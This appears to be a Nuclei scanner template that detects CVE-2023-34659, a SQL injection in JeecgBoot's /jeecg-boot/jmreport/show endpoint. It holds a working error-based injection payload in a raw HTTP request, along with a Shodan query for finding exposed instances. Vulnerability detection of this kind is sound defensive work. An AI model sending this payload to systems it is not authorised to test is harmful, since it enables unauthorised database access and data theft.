58 lines
1.9 KiB
YAML
58 lines
1.9 KiB
YAML
id: CVE-2023-34659
|
|
|
|
info:
|
|
name: JeecgBoot 3.5.0 - SQL Injection
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: |
|
|
jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
|
|
remediation: |
|
|
Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://github.com/jeecgboot/jeecg-boot/issues/4976
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34659
|
|
- https://github.com/izj007/wechat
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-34659
|
|
cwe-id: CWE-89
|
|
epss-score: 0.21629
|
|
epss-percentile: 0.96326
|
|
cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: jeecg
|
|
product: jeecg_boot
|
|
shodan-query: http.favicon.hash:1380908726
|
|
tags: cve2023,cve,jeecg,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /jeecg-boot/jmreport/show HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json;charset=UTF-8
|
|
|
|
{"id":"961455b47c0b86dc961e90b5893bff05","apiUrl":"","params":"{"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '"}"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "XPATH syntax error:"
|
|
- "SQLException"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450221009479667c973f231f672de742d4d97331b4c21e19dbb0a788759c317ba27f8c39022048d0e0658080c3f33b833368dad4f9bf938432524fa1d99a3bc9bb30daf57e9f:922c64590222798bb761d5b6d8e72950 |